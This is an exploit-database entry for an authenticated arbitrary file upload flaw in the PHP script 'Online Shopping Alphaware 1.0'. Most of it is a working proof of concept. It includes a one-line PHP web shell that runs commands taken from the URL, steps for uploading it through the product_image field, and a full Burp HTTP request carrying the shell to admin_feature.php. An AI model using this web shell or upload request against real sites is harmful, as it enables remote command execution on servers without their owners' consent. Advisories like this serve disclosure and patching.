id: 34803
date: 08/06/2020
title: Online Shopping Alphaware 1.0 Arbitrary File Upload Vulnerability
author: Edo Maland
cves: 

# Exploit Title: Online Shopping Alphaware 1.0  - Arbitrary File Upload (Authenticated)
# Exploit Author: Edo Maland
# Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql
# Version: 1.0
# Tested On Windows & Linux Server

# Vulnerability Details
# Description :  Authenticated User allowed to upload all extension (php, exe, elf, and etc) like a malware/backdoor to file uploaded directory
# Vulnerable Parameter : product_image


# POC


Create a malicious PHP file with this content: <?=`$_GET[0]`?>
Save as "exploit.php"
Authenticated, go to product and add the new product. Upload your file and send the HTTP request to Burp.

# Burp Request

POST /alphaware/admin/admin_feature.php HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------926066153706642368381971988
Content-Length: 1176
Origin: http://example.com
Connection: close
Referer: http://example.com/alphaware/admin/admin_feature.php
Cookie: PHPSESSID=tokl2nlnjtjud32laqupj07sss
Upgrade-Insecure-Requests: 1

-----------------------------926066153706642368381971988
Content-Disposition: form-data; name="product_image"; filename="exploit.php"
Content-Type: application/octet-stream

<?=`$_GET[0]`?>
-----------------------------926066153706642368381971988
Content-Disposition: form-data; name="product_code"

749
-----------------------------926066153706642368381971988
Content-Disposition: form-data; name="product_name"

Evil
-----------------------------926066153706642368381971988
Content-Disposition: form-data; name="product_price"

1337
-----------------------------926066153706642368381971988
Content-Disposition: form-data; name="product_size"

2
-----------------------------926066153706642368381971988
Content-Disposition: form-data; name="brand"

Evil 
-----------------------------926066153706642368381971988
Content-Disposition: form-data; name="qty"

12
-----------------------------926066153706642368381971988
Content-Disposition: form-data; name="category"

feature
-----------------------------926066153706642368381971988
Content-Disposition: form-data; name="add"

Add
-----------------------------926066153706642368381971988--

#  0day.today [2023-03-26]  #